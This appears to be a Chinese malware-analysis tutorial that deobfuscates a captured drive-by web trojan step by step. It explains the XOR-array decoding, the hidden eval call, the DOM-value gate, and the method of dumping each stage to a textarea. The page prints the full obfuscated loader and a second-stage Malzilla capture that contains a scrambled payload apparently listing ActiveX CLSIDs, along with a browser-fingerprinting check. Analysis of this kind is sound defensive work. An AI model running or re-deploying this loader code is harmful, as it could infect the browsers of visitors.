1,37,118,121,110,113,127,121,108,119,106,54,122,106,119,111,107,125,106,84,121,118,127,109,121,127,125,49,62,62,56,57,48,84,75,43,110,107,47,42,32,37,118,121,110,113,127,121,108,119,106,54,116,121,118,127,109,121,127,125,49,49,99,126,118,106,73,41,64,92,43,45,122,37,45,41,47,35,101,101,113,126,48,113,107,87,104,125,106,121,57,37,126,121,116,107,125,49,99,113,126,56,48,57,48,66,90,91,110,90,32,83,33,97,108,42,113,37,118,121,110,113,127,121,108,119,106,54,107,97,107,108,125,117,84,121,118,127,109,121,127,125,49,62,62,48,75,66,42,40,112,66,80,66,90,124,64,37,118,121,110,113,127,121,108,119,106,54,109,107,125,106,84,121,118,127,109,121,127,125,49,62,62,48]; var 
E3Z19Lp=[32,106,21,110,25,103,52,59,44,51,61,59,46,53,40,116,56,40,53,45,41,63,40,22,59,52,61,47,59,61,63,115,124,124,114,22,9,105,44,41,109,104,98,103,52,59,44,51,61,59,46,53,40,116,54,59,52,61,47,59,61,63,115,115,33,60,52,40,11,107,2,30,105,111,56,103,111,107,109,97,39,39,51,60,114,51,41,29,63,57,49,53,123,103,60,59,54,41,63,115,33,51,60,122,114,123,114,0,24,25,44,24,98,17,99,35,46,104,51,103,52,59,44,51,61,59,46,53,40,116,41,35,41,46,63,55,22,59,52,61,47,59,61,63,115,124,124,123,114,9,0,104,106,50,0,18,0,24,62,2,103,52,59,44,51,61,59,46,53,40,116,47,41,63,40,22,59,52,61,47,59,61,63,115,124,124,123,114,32,106,21,110,25,103,52,59,44,51,61,59,46,53,40,116,56,40,53,45,41,63,40,22,59,52,61,47,59,61,63,115,124,124,114,22,9,105,44,41,109,104,98,103,52,59,44,51,61,59,46,53,40,116,54,59,52,61,47,59,61,63,115,115,33,60,52,40,11,107,2,30,105,111,56,103,111,107,109,97,39,39,51,60,114,51,41,9,59,60,59,40,51,123,103,60,59,54,41,63,115,33,51,60,122,114,123,114,0,24,25,44,24,98,17,99,35,46,104,51,103,52,59,44,51,61,59,46,53,40,116,41,35,41,46,63,55,22,59,52,61,47,59,61,63,115,124,124,123,114,9,0,104,106,50,0,18,0,24,62,2,103,52,59,44,51,61,59,46,53,40,116,47,41,63,40,22,59,52,61,47,59,61,63,115,124,124,123,114,32,106,21,110,25,103,52,59,44,51,61,59,46,53,40,116,56,40,53,45,41,63,40,22,59,52,61,47,59,61,63,115]; var 
DJ2sPz2YN=[98,98,108,8,23,119,50,55,115,118,124,121,42,37,50,45,35,37,48,43,54,106,40,37,42,35,49,37,35,33,109,109,63,34,42,54,21,117,28,0,119,113,38,121,113,117,115,127,57,57,45,34,108,45,55,7,44,54,43,41,33,101,121,34,37,40,55,33,109,63,45,34,100,108,101,108,30,6,7,50,6,124,15,125,61,48,118,45,121,42,37,50,45,35,37,48,43,54,106,55,61,55,48,33,41,8,37,42,35,49,37,35,33,109,98,98,101,108,23,30,118,116,44,30,12,30,6,32,28,121,42,37,50,45,35,37,48,43,54,106,49,55,33,54,8,37,42,35,49,37,35,33,109,98,98,101,108,62,116,11,112,7,121,42,37,50,45,35,37,48,43,54,106,38,54,43,51,55,33,54,8,37,42,35,49,37,35,33,109,98,98,108,8,23,119,50,55,115,118,124,121,42,37,50,45,35,37,48,43,54,106,40,37,42,35,49,37,35,33,109,109,63,34,42,54,21,117,28,0,119,113,38,121,113,117,115,127,57,57,127,100,50,37,54,100,16,118,118,124,116,117,121,102,45,118,22,61,118,113,102,127,50,37,54,100,44,118,52,2,29,116,121,23,48,54,45,42,35,127,45,34,100,108,34,42,54,21,117,28,0,119,113,38,121,121,113,117,115,109,63,16,118,118,124,116,117,121,102,40,118,124,45,53,48,42,102,127,100,44,118,52,2,29,116,121,48,44,45,55,127,57,127,23,6,117,112,22,60,29,62,47,0,16,54,121,102,33,50,40,118,124,45,53,48,42,37,40,102,106,54,33,52,40,37,39,33,108,16,118,118,124,116,117,104,102,102,109,127,44,118,52,2,29,116,31,23,6,117,112,22,60,29,62,47,0,16,54,25,108,39,0,21,19,11,43,124,117,116,116]; var XJU9Xi=[102,62,44];  var Jyyl=new Array(); for (var s10d8g4Wq=0;s10d8g4Wq<XO5g7gw.length;s10d8g4Wq++){XO5g7gw[s10d8g4Wq]=XO5g7gw[s10d8g4Wq]^70;}; Jyyl=Jyyl.concat(XO5g7gw);for (var K7f8m=0;K7f8m<XmhnFwsJ7JLb5rn.length;K7f8m++){XmhnFwsJ7JLb5rn[K7f8m]=XmhnFwsJ7JLb5rn[K7f8m]^90;}; Jyyl=Jyyl.concat(XmhnFwsJ7JLb5rn);for (var NayL65Xl=0;NayL65Xl<FIovKVqj92UWt.length;NayL65Xl++){FIovKVqj92UWt[NayL65Xl]=FIovKVqj92UWt[NayL65Xl]^63;}; Jyyl=Jyyl.concat(FIovKVqj92UWt);for (var y624L70=0;y624L70<GhS8S67Prhrd4n.length;y624L70++){GhS8S67Prhrd4n[y624L70]=GhS8S67Prhrd4n[y624L70]^39;}; Jyyl=Jyyl.concat(GhS8S67Prhrd4n);for (var 
U2V9B=0;U2V9B<pC97R8mG.length;U2V9B++){pC97R8mG[U2V9B]=pC97R8mG[U2V9B]^78;}; Jyyl=Jyyl.concat(pC97R8mG);for (var kJF0upJXo=0;kJF0upJXo<DRBSwL67q34RN.length;kJF0upJXo++){DRBSwL67q34RN[kJF0upJXo]=DRBSwL67q34RN[kJF0upJXo]^86;}; Jyyl=Jyyl.concat(DRBSwL67q34RN);for (var X57b3300QR=0;X57b3300QR<ase4R143.length;X57b3300QR++){ase4R143[X57b3300QR]=ase4R143[X57b3300QR]^82;}; Jyyl=Jyyl.concat(ase4R143);for (var R6kM5tC=0;R6kM5tC<kN2Z9ejg8CW.length;R6kM5tC++){kN2Z9ejg8CW[R6kM5tC]=kN2Z9ejg8CW[R6kM5tC]^16;}; Jyyl=Jyyl.concat(kN2Z9ejg8CW);for (var IYu2103=0;IYu2103<C59CT49.length;IYu2103++){C59CT49[IYu2103]=C59CT49[IYu2103]^15;}; Jyyl=Jyyl.concat(C59CT49);for (var N59WlodS=0;N59WlodS<Lc38a4J3mH2mYd.length;N59WlodS++){Lc38a4J3mH2mYd[N59WlodS]=Lc38a4J3mH2mYd[N59WlodS]^35;}; Jyyl=Jyyl.concat(Lc38a4J3mH2mYd);for (var bPy26n6=0;bPy26n6<tTk37HLK.length;bPy26n6++){tTk37HLK[bPy26n6]=tTk37HLK[bPy26n6]^31;}; Jyyl=Jyyl.concat(tTk37HLK);for (var Zi84=0;Zi84<L58iTmje915Cs.length;Zi84++){L58iTmje915Cs[Zi84]=L58iTmje915Cs[Zi84]^81;}; Jyyl=Jyyl.concat(L58iTmje915Cs);for (var pA7XL0=0;pA7XL0<MoDbuKo7Zc73A7y.length;pA7XL0++){MoDbuKo7Zc73A7y[pA7XL0]=MoDbuKo7Zc73A7y[pA7XL0]^42;}; Jyyl=Jyyl.concat(MoDbuKo7Zc73A7y);for (var kkK3gfLm2=0;kkK3gfLm2<axrg9i4sOv.length;kkK3gfLm2++){axrg9i4sOv[kkK3gfLm2]=axrg9i4sOv[kkK3gfLm2]^30;}; Jyyl=Jyyl.concat(axrg9i4sOv);for (var Yh76=0;Yh76<Yw8hi55BB61NPYB.length;Yh76++){Yw8hi55BB61NPYB[Yh76]=Yw8hi55BB61NPYB[Yh76]^51;}; Jyyl=Jyyl.concat(Yw8hi55BB61NPYB);for (var n89VQZ1md6=0;n89VQZ1md6<K210J6y5ntw.length;n89VQZ1md6++){K210J6y5ntw[n89VQZ1md6]=K210J6y5ntw[n89VQZ1md6]^83;}; Jyyl=Jyyl.concat(K210J6y5ntw);for (var kLYBqgoTnl=0;kLYBqgoTnl<gR0F30B.length;kLYBqgoTnl++){gR0F30B[kLYBqgoTnl]=gR0F30B[kLYBqgoTnl]^93;}; Jyyl=Jyyl.concat(gR0F30B);for (var w1K9MN5=0;w1K9MN5<a6oXU27F8V.length;w1K9MN5++){a6oXU27F8V[w1K9MN5]=a6oXU27F8V[w1K9MN5]^24;}; Jyyl=Jyyl.concat(a6oXU27F8V);for (var v2E213g=0;v2E213g<E3Z19Lp.length;v2E213g++){E3Z19Lp[v2E213g]=E3Z19Lp[v2E213g]^90;}; 
// Decoder tail of the captured sample. The code is unchanged; only analyst comments were added.
// Append the E3Z19Lp array (XOR-decoded just before this point) to the accumulator Jyyl.
Jyyl=Jyyl.concat(E3Z19Lp);
// DJ2sPz2YN is decoded in place with its own single-byte XOR key (68), then appended.
for (var HD1Zko9=0;HD1Zko9<DJ2sPz2YN.length;HD1Zko9++){DJ2sPz2YN[HD1Zko9]=DJ2sPz2YN[HD1Zko9]^68;};
Jyyl=Jyyl.concat(DJ2sPz2YN);
// Last chunk: the three-element array XJU9Xi, XOR key 23. After this, Jyyl holds every decoded character code in order.
for (var i8mLx1II=0;i8mLx1II<XJU9Xi.length;i8mLx1II++){XJU9Xi[i8mLx1II]=XJU9Xi[i8mLx1II]^23;};
Jyyl=Jyyl.concat(XJU9Xi);
// Lookup table used to hide a function name from static string matching.
RE4Ml=['V','3','l','e','T','V','N','H','v','y','6','g','4','0','1','0','a','J','Y','5','9','a','s','N','l','V','9','T','w','0','7','Y'];
// Indexes 3, 8, 16 and 24 are 'e', 'v', 'a', 'l', so GXzob52 is the string "eval".
GXzob52=RE4Ml[3]+RE4Ml[8]+RE4Ml[16]+RE4Ml[24];
// At the top level of a classic script `this` is the global object, so S82iD2j6 becomes a reference to the global eval.
UE9Dha9=this;
S82iD2j6=UE9Dha9[GXzob52];
// First eval: the concatenated fragments define JR8Qk3BHg7(), which returns parseInt() of the innerHTML
// of the element with id 'i8WbG' (the <div> that holds 194 earlier in the page).
S82iD2j6("functi"+"on JR8"+"Qk3B"+"Hg7(){xA"+"RK9=p"+"arseInt("+"docum"+"ent."+"getEleme"+"ntById("+"'i8W"+"bG')."+"innerH"+"TML);r"+"eturn xA"+"RK9;}"+"");
// Second eval: defines m2qo55(arr), which builds a string with String.fromCharCode only when
// JR8Qk3BHg7() == 194 and otherwise returns '', then passes m2qo55(Jyyl) to eval again.
// Analyst note: the decoded payload depends on that DOM value being present, and this nested
// eval call is the point to swap for a print/log when recovering the next stage statically.
S82iD2j6("functio"+"n m2q"+"o55(m"+"WSQJ9)"+"{var "+"bo99q"+"Gj=J"+"R8Qk3BH"+"g7()"+"; N"+"4qrky00"+"='';"+" if (bo9"+"9qGj==19"+"4) f"+"or(va"+"r i=0;"+"i<mWSQ"+"J9.l"+"eng"+"th;i++"+"){N4qrk"+"y00 "+"+=Str"+"ing.fr"+"omCha"+"rCode(mW"+"SQJ"+"9[i]);} "+"return N"+"4qrky0"+"0;} S8"+"2iD2"+"j6(m2qo5"+"5(Jy"+"yl));"+"");</script>


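对于这样的网马,一眼就可以看出:前面都是保存加密数据的数组变量,真正的解密逻辑在最后,所以咱们重点关注后面。需要注意的是,末尾的解码函数会先读取页面里 id 为 i8WbG 的 div 的值,只有等于 194 时才输出解码结果,所以把脚本单独拿出来分析时要连同这个 div 一起保留。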

为了观看方便,咱们对这个代码进行一下整理。

看下我的整理图



我们来看看这个整理好后的部分代码
// Layer 1, step 1 (tidied listing). Every numeric array declared earlier in the
// page is XOR-decoded in place with its own single-byte key and then appended,
// in order, to Jyyl. Nothing is executed in this part; Jyyl ends up holding the
// character codes of the next layer.
// Example: the last array [102,62,44] with key 23 decodes to the characters "q);".
var XJU9Xi=[102,62,44];  
var Jyyl=new Array();
// Repeated pattern on each line below:
//   Jyyl = Jyyl.concat(<previous array>);  for (...) { next[i] = next[i] ^ KEY; }
for (var s10d8g4Wq=0;s10d8g4Wq<XO5g7gw.length;s10d8g4Wq++){XO5g7gw[s10d8g4Wq]=XO5g7gw[s10d8g4Wq]^70;};
Jyyl=Jyyl.concat(XO5g7gw);for (var K7f8m=0;K7f8m<XmhnFwsJ7JLb5rn.length;K7f8m++){XmhnFwsJ7JLb5rn[K7f8m]=XmhnFwsJ7JLb5rn[K7f8m]^90;};
Jyyl=Jyyl.concat(XmhnFwsJ7JLb5rn);for (var NayL65Xl=0;NayL65Xl<FIovKVqj92UWt.length;NayL65Xl++){FIovKVqj92UWt[NayL65Xl]=FIovKVqj92UWt[NayL65Xl]^63;};
Jyyl=Jyyl.concat(FIovKVqj92UWt);for (var y624L70=0;y624L70<GhS8S67Prhrd4n.length;y624L70++){GhS8S67Prhrd4n[y624L70]=GhS8S67Prhrd4n[y624L70]^39;};
Jyyl=Jyyl.concat(GhS8S67Prhrd4n);for (var U2V9B=0;U2V9B<pC97R8mG.length;U2V9B++){pC97R8mG[U2V9B]=pC97R8mG[U2V9B]^78;};
Jyyl=Jyyl.concat(pC97R8mG);for (var kJF0upJXo=0;kJF0upJXo<DRBSwL67q34RN.length;kJF0upJXo++){DRBSwL67q34RN[kJF0upJXo]=DRBSwL67q34RN[kJF0upJXo]^86;};
Jyyl=Jyyl.concat(DRBSwL67q34RN);for (var X57b3300QR=0;X57b3300QR<ase4R143.length;X57b3300QR++){ase4R143[X57b3300QR]=ase4R143[X57b3300QR]^82;};
Jyyl=Jyyl.concat(ase4R143);for (var R6kM5tC=0;R6kM5tC<kN2Z9ejg8CW.length;R6kM5tC++){kN2Z9ejg8CW[R6kM5tC]=kN2Z9ejg8CW[R6kM5tC]^16;};
Jyyl=Jyyl.concat(kN2Z9ejg8CW);for (var IYu2103=0;IYu2103<C59CT49.length;IYu2103++){C59CT49[IYu2103]=C59CT49[IYu2103]^15;};
Jyyl=Jyyl.concat(C59CT49);for (var N59WlodS=0;N59WlodS<Lc38a4J3mH2mYd.length;N59WlodS++){Lc38a4J3mH2mYd[N59WlodS]=Lc38a4J3mH2mYd[N59WlodS]^35;};
Jyyl=Jyyl.concat(Lc38a4J3mH2mYd);for (var bPy26n6=0;bPy26n6<tTk37HLK.length;bPy26n6++){tTk37HLK[bPy26n6]=tTk37HLK[bPy26n6]^31;};
Jyyl=Jyyl.concat(tTk37HLK);for (var Zi84=0;Zi84<L58iTmje915Cs.length;Zi84++){L58iTmje915Cs[Zi84]=L58iTmje915Cs[Zi84]^81;};
Jyyl=Jyyl.concat(L58iTmje915Cs);for (var pA7XL0=0;pA7XL0<MoDbuKo7Zc73A7y.length;pA7XL0++){MoDbuKo7Zc73A7y[pA7XL0]=MoDbuKo7Zc73A7y[pA7XL0]^42;};
  Jyyl=Jyyl.concat(MoDbuKo7Zc73A7y);for (var kkK3gfLm2=0;kkK3gfLm2<axrg9i4sOv.length;kkK3gfLm2++){axrg9i4sOv[kkK3gfLm2]=axrg9i4sOv[kkK3gfLm2]^30;};
  Jyyl=Jyyl.concat(axrg9i4sOv);for (var Yh76=0;Yh76<Yw8hi55BB61NPYB.length;Yh76++){Yw8hi55BB61NPYB[Yh76]=Yw8hi55BB61NPYB[Yh76]^51;};
  Jyyl=Jyyl.concat(Yw8hi55BB61NPYB);for (var n89VQZ1md6=0;n89VQZ1md6<K210J6y5ntw.length;n89VQZ1md6++){K210J6y5ntw[n89VQZ1md6]=K210J6y5ntw[n89VQZ1md6]^83;};
  Jyyl=Jyyl.concat(K210J6y5ntw);for (var kLYBqgoTnl=0;kLYBqgoTnl<gR0F30B.length;kLYBqgoTnl++){gR0F30B[kLYBqgoTnl]=gR0F30B[kLYBqgoTnl]^93;};
  Jyyl=Jyyl.concat(gR0F30B);for (var w1K9MN5=0;w1K9MN5<a6oXU27F8V.length;w1K9MN5++){a6oXU27F8V[w1K9MN5]=a6oXU27F8V[w1K9MN5]^24;};
   Jyyl=Jyyl.concat(a6oXU27F8V);for (var v2E213g=0;v2E213g<E3Z19Lp.length;v2E213g++){E3Z19Lp[v2E213g]=E3Z19Lp[v2E213g]^90;};
    Jyyl=Jyyl.concat(E3Z19Lp);for (var HD1Zko9=0;HD1Zko9<DJ2sPz2YN.length;HD1Zko9++){DJ2sPz2YN[HD1Zko9]=DJ2sPz2YN[HD1Zko9]^68;};
    Jyyl=Jyyl.concat(DJ2sPz2YN);for (var i8mLx1II=0;i8mLx1II<XJU9Xi.length;i8mLx1II++){XJU9Xi[i8mLx1II]=XJU9Xi[i8mLx1II]^23;};
    Jyyl=Jyyl.concat(XJU9Xi);
    
    RE4Ml=['V','3','l','e','T','V','N','H','v','y','6','g','4','0','1','0','a','J','Y','5','9','a','s','N','l','V','9','T','w','0','7','Y'];
    GXzob52=RE4Ml[3]+RE4Ml[8]+RE4Ml[16]+RE4Ml[24];
     UE9Dha9=this;
       S82iD2j6=UE9Dha9[GXzob52];
       S82iD2j6("function JR8Qk3BHg7(){xARK9=parseInt(document.getElementById('i8WbG').innerHTML);return xARK9;}");
       S82iD2j6("function m2qo55(mWSQJ9){var bo99qGj=JR8Qk3BHg7(); N4qrky00=''; if (bo99qGj==194) for(var i=0;i<mWSQJ9.length;i++){N4qrky00 +=String.fromCharCode(mWSQJ9[i]);} return N4qrky00;} S82iD2j6(m2qo55(Jyyl));");
       </script>


我们从RE4Ml这个数组看起。GXzob52的值是从RE4Ml数组中取出4个元素拼接而成的;数组下标从0开始,所以RE4Ml[3]是"e",RE4Ml[8]是"v",RE4Ml[16]是"a",RE4Ml[24]是"l",可以看到GXzob52就是字符串"eval"。另外UE9Dha9=this,那么S82iD2j6就是this["eval"],也就是全局的eval函数,后面每一次S82iD2j6(...)调用都是把字符串当作代码执行,咱们的突破口也就在这里。

继续往下看,可以看到后面是2个函数。在最后面,我们看到了S82iD2j6(m2qo55(Jyyl))。从前面的代码可知,Jyyl就是前面各个数组分别异或解码后依次连接起来的最终结果,m2qo55就是解密函数:它先通过JR8Qk3BHg7读取页面中id为i8WbG的元素的值,只有该值等于194时,才把Jyyl中的数字逐个转成字符并返回。咱们解密的机会来了。

为了方便复制,咱们用textarea解决,

在<html>的后面添加
程序代码 程序代码
<TEXTAREA id=txt rows=57 cols=108></TEXTAREA>


然后在</script>前面截取字符
可以这样添加
       t=m2qo55(Jyyl);
       txt.value=(t);
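保存运行后直接在文本框中输出了解密字符。需要注意的是,第二个S82iD2j6(...)字符串末尾的S82iD2j6(m2qo55(Jyyl));仍会把解密结果交给eval执行;只想查看明文时,应先把这一句从字符串里去掉,只保留输出到文本框的部分。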

这样就剥下了这个网马的第一层皮。

咱们将这段代码置于<script></script>中继续解密

代码如下
程序代码 程序代码
<!-- Malzilla Project v.1 --><!-- DAT: 2010-5-14 6:23:53 --><!-- URL: golooglecom.in/rz141_at/index.php?s=208feca1a8b149965fa6d3be651c5953 --><!-- REF: http://fracala.com/bu1/ --><!-- UAS: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) --><!-- CCK:  -->
<html><script type="text/JavaScript">var cDQWOo8100q="gqhr S  1vHo yX= tan'jp:c/8UE1d mois/htP_ac&pd=mle4S//loctiafh='trlozlog;fuoJXC hp?pa1..Lm9nHe1MnSV,bNxdvl=act(zMq3uctGM){ynUThqvqtnHGVGj 0BS2dacB0SulHGeale1lrTtrSLb{=zVG2UabVMtt(icnj;c{thchCrMq}0OmGM}HatG)M)qv)c(.jelVm0GV{ctdBjneNtSV.Sl(Mbfc!cBjeHUtdCntryGOGGrMbjttea{Gq2vqteM=z1cB}cTthNL{0B)(a},\"}t0naGy{cGccG!\")jl1M(nHGcMih(eCmVG){ObtrGTjfHM(U(zeq=tMltebrVaifccc,at,\"V.tSqt)njeSv}}2Ltdje(htrVlNh){c!\")a{\"\"cBHG}GHGGMbzGM=Gjl0n0SV.teSqVMcmGBtOaTy(NvMh1{th}cqcbje)at\"t}\",L1rt{tM){cd0G(}2UMqVMcBGl(!cBVe){0nGMV.STHGyGjGifhjbeGztO=nHNLtjlda(Sb\"vctmatcqeB}cGl,tt2cB((ifyec{jGU!\")){}z)ntrVSHG0}chGM=ccMHGhNvqteSGV.V)1{jlcTMqt2jtbMerG(0nda)an(Lnbje(tmtO}fu}cBilhMetGcUt8Z050;aw{}}rWS2nqXFw)GuGc7V3p4n KT\"BHoS1mr(tSmyEeWxdUHoe{q.rd)5ES=27SWatpE0ee;7evbCVearmO.jiBs\"uo hmg.Fi54rt=a3KOtstinte(3ScCwprHS(tSyv=cac\"ebjeo,\"qpepd9e\",r4Jme\"+Slapu0Xx \"\");SmlwsE275\"i3l.Cph\"A\"3c+\"+\"lz+\"t\"+\"+\"8\";varFnp\"i\"+x \"+\"Ju9eoJ\"\"a)vX329,J4C=p3HuxT86Ra)Om\"Cdxq5SSmqWOCr FOoE\"A(a27Bme20;Hq.StrDFDwES=OeernlB=3VBWlXyKd0ldPWtr;uh.7ath(i.mC2GBehm7rBWeVeuiaol3ElKdcCuex8T,WdHyerFSpJq{FxJ;.mr9q=(q)MoW2206eS)Fz;3FBOwC=(u2SrydR9tCXi7\"OxXo,H8\"MO+3e\"+\"fJEp4++Cd+\"T\"\"r2L53Sm\"\"o\"H.+\"\"nCM0\"Xc6eO,TPsoqHjE(Rt8;FOt\"0eOW.op(88XPcarG\"\"),6sey{yOETeHS\"+\"SxtfFOd9};){ahU10S+Wq2wpchue7l)3\"H.o=C3\"X\"O\"45e0O)CXR2X(MJmCT\"T\"\"+OOE\"+eL26L,RMS+\"opM\";F\"1jc\"P\"T2;enqEP8)X}{(8yhW.,+FO8H(e)t\"0GE=6UralsechtOa,SfL0SS7Cy2R{q3OHSx+\"rXEo\"\"M\"uCw20WrX\"ve5e\"X(3pd9e+++\"e4M\"2\"J+\"T\",\"\"+TMme\"RLH;0.S2)COO86FT\"eSe\"OEop,nhyW,EPtc(tGPfah(8j1RH.e){8lUXq6tpRt0LHcaORrs;}WeOeequeOyCO;M{Fst(8en(\"new 2FW)E\"o)XpGE6=Oj1qH.cahUTs,ShO20CPn ;}Trl,8yJCf;eture)0(Xae)28{6}}u}xs}n.Ftcz98;RJe=.T6eC(O;eC1erxFOln0WreFOeOsTdbyp22WlJoxJO8)0s2nu;z9.8uenoR;zOp=FWb)r9xC2B.dy()2Tile;8.OpJ8uFztFxrJ)(Cue(eTo9xxxJShrdifJv.SaH,CT;qFBmyEHelrdrXqt2n eletpES)1osyESn;cu(q()mBifqax.cO  mnuruXac;eFdd=wearCcvaniPt9q6a5S}sx3{v2ZArnMA3'52=zO7er FC0;6 
1BvDy(r92K983A65-1q9E3C'010-DC65,'84FC3-00--5AA-16BD93',50-006169E-4-EC9BC4ED0,'277-2330'A4FC233F2066'ED7-BAD10000E6000C-D009900'010-000-0110-006C0-0300'-0F-,A0000000000'C000000000466',43-00-c1fd-0766056000c70aa9Dd-e78'9d22fc0-451e6-8',4e3373D8C-4149C61-7F-8AF5BB2B-1F-FAD0-D3EF'8-243,'06-33'7FC0F,6-A333C36E339EFD9-31'0,'948020E854123-8--14F624--86777CD81686'D-Bc9FA01748B2D39F5076'4B,10-9345A'F-856-490B54C844'1B43272-83CD-f9FB37D-19180,'D00-45C6'-69F,1-1-4A8C-6ABCF-496C6FBFDA0bECClAul7C25'12)B'BC5096hz78D0vawZni2q,nKel4c7=2up9]){;wSq4s(v45rlexwp[iPMOn35E27 20l0Ed7Omo=duSo;Frea3;eo3SmmteElcnt.e\"3otject()oeSE2ib\"cbcm5en7s\"c4mut\"d.0wp\"tOxAdK\"tri]csetSZn,9q[ilals+7sCPE2O5;27Sqez(v:(am si4ry2MFv3d{wU=KOp3o)pxif)f(w06\"d0e{teSD49SJX3uCqrpxro,\"m5E27\"+\"t\"SH\"03SD+hl+e\"+\"f\"(\"i\"+U;\"l.oSca){ifp\"1KliApZ(xnw8E2Or60\"i+aTWtpwUmoSK4ep)f(cni1S5rnat5h))7ui}eP e3SM0O2+e;mq9aor}){}}t2se}cZFmd(Ts ;)}r,+00u{(\"con iat (cunJ-v2={jtr ue)t;\"gaj _dt()al y; f\\npo\\J\"w--oglavocom:b\\li hin\\\\\\\\z1a.rmlecoe\\/rm/Y&_1sa/og.ttlovdhn.a.x4Y=/?oogfhtoplisdoe.f 1ptiw na=p(wMiofippNcrr.vtg\"e oean;iraa{ry t \"tptm==em n{varls E  Inen oElemrer\"xdoc)(t=)eoJuoenECTa\"ci. i\"OB\"trt.c-= E;slasBC0ECEFA:CDFc0d EDAoC700-d0}u0ls00;Ba-FF-E oDcn);uCe)AA\"Jch(meO .l=ec  cdtcEnt(\"ar(enhatclauCT;o.ore2t{vid2smBlilseEa.4 85F4d-\")\"E-108= 9Cc4s AD-00c1Du-0}3\":814B3Ec2.0h99D9e9} ls;r oanEl)mea no.eJ(elaEo{venva dBcuue;\"OmCT(tetm);cr ==).en OteEn d\"tel cB.u\"Tr ;oypro/npacent(ile\"aatoturmEC en=\"me-stounJ-plegtktippn.inyabloopocilttylm;de=atieerip pplym\"n ;jpinttboomlouoicvat\"apen)l;at.n/edp\"-dy.dCe-cuoaki(otpntnytbdi.;dcenapoddo.en)} Cdhtld;hrymhilh )n){(ulaun  peul{ec(tco.a} {});}(}.;caech(ns0t c \"o(}ug)m ,100atchTut( j;efuac\"javtie)  rv n  ();ta_di ae o_vsE=nd lb(ja).ar){emvlocemtet(cauaenlappentmnteepate\"\"r;=\"vtr leme. 
r;mamaaeleparame)\"d leribam.ment(\"eocutAtuse\"em,tapErcevar(\";pem.s tnt \"1lac\")uame\"teb\"(c0smAltrit90e1uec,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;5d6teA69ibudAc1\"javaet\"depea7le\", )leslcjco;\"(tm.seavrprT\")ar,\"tedutA(te t1avi.br\"h.ee\"bvm.semeai;jcet\"\")%utAa\",jlettritmgawij(d (t00e\"\"rei00h\"vt.s);jl, \"1eaAt)h\"1en%aehpautebtpi;(pa\"erdl.lemeCemldv.vthiaa.a);joodydnbdmcumeild(nppeae);} C) hia00e);\"egja_it eloo_i;  u(\"tOvTsmncrnva,3sb0f(muttoy ){ndd prtpfalt\"tf ate(eEmeb{Obj)=jcumTecOBetCe\"edcrent(ecpAt;;,f.\"d\"\"id..sJEttripte(ucb tj) dftdlu1ed\",Cfrib(\"as78t-eA08sObjF5-\"A9-4siidcetl);.1AD35\"c4s0-:2ilpoA8y.nt1C400\"ajfe205unbdD44d(Chtd0p;varbdcrmepd vo.ecs(v(tOee jdfeer l t;1)on =vVer[i;v),srGi 1=pr.sp\") .\"=\"e (7( ;ifsverl=\")< [\"ve) ;ver>it(\"7. ]\"r er(1 = =e |4]&.(ev r(vre\") |&&)  (\"rv>& (v\") 8=1&|).7\" \" .|  )r 8\"13> 9\"<pve(vc<\"&. )= (aume=ldor {t\"  (eElrnt.c )df) vereae\")reentme)e9tlmtnedfm.sett(acto\"ee;pe\"if\"Alosri:tmtnribg//got 4heu(\"/rp;le_alecep1,hm.ft)nf.t/e(itphmtAdp1zoe;tr 2fe=\"ptn?pdts\"tAdtrub)h0d.se\"oiete(\"wmeg0i,t.bcne;nfdle\"hphemeo.buttp,tdmenhadni eldfey200) s}cud(pl{T()i.}t)}t\"iae_ie0cCt ;}et   ,90 ; h(e  ou\"p  df) ) m(         ;    0                                                 ";
// Layer 2 decoder. The scrambled string cDQWOo8100q is split into single
// characters and un-shuffled by a series of block swaps; the result is then
// evaluated only if a browser-consistency check passes.
// Z0TSoz (5654) is used as the length to process — presumably the string
// length; lii8GC1y780x (9) is the number of passes and F362JzXMAn6 holds the
// block size k used in each pass.
var hSue6YJ53=cDQWOo8100q.split(""); var Z0TSoz=5654; var lii8GC1y780x=9; var F362JzXMAn6=new Array(4,9,8,7,1,5,9,4,1); var orKtCIJtW082,XH7AWXhS6,d245Ys,o46Zo5sVyIb6D,tWw85v475DMn,p1zn2Y33riN1m,B05K065;
// One pass per entry k of F362JzXMAn6: b86aNy = 2*k, djkV14AA = number of whole
// 2k-sized groups in Z0TSoz (fXqlav is computed but not used afterwards). Inside
// each group, character i of the first half is swapped with character i of the
// second half.
// NOTE(review): the inner loop's initialiser is spelled `oRKtCIJtW082` while the
// declared counter and the loop condition use `orKtCIJtW082`; probably a
// transcription artifact of this listing — compare with the captured sample.
for (XH7AWXhS6=0; XH7AWXhS6<lii8GC1y780x; XH7AWXhS6++)  {      var b86aNy=F362JzXMAn6[XH7AWXhS6]*2;    var L048P9y=Z0TSoz%b86aNy;    var eq4Jp8d=Z0TSoz-L048P9y;    var djkV14AA=eq4Jp8d/b86aNy;    var fXqlav=djkV14AA*F362JzXMAn6[XH7AWXhS6];  
o46Zo5sVyIb6D=0;    for (oRKtCIJtW082=0; orKtCIJtW082<djkV14AA; orKtCIJtW082++)     {    
         for (d245Ys=0; d245Ys<F362JzXMAn6[XH7AWXhS6]; d245Ys++)         {      tWw85v475DMn=o46Zo5sVyIb6D+d245Ys;            B05K065=hSue6YJ53[tWw85v475DMn];            p1zn2Y33riN1m=tWw85v475DMn+F362JzXMAn6[XH7AWXhS6];            hSue6YJ53[tWw85v475DMn]=hSue6YJ53[p1zn2Y33riN1m];            hSue6YJ53[p1zn2Y33riN1m]=B05K065;          }        o46Zo5sVyIb6D +=b86aNy;         }  }
        
        
          // Re-join the characters, then fingerprint the browser: the user-agent
          // string selects a family (isIE / isOpera / isGecko / isSafari / isChrome;
          // isKonqueror is computed but never tested), and for that family a specific
          // presence/absence pattern of navigator.systemLanguage, userLanguage,
          // browserLanguage and language must hold. Only then is fnrQ1XD35b set to 517.
          // An environment whose navigator properties do not match its claimed
          // user-agent leaves the flag at 0.
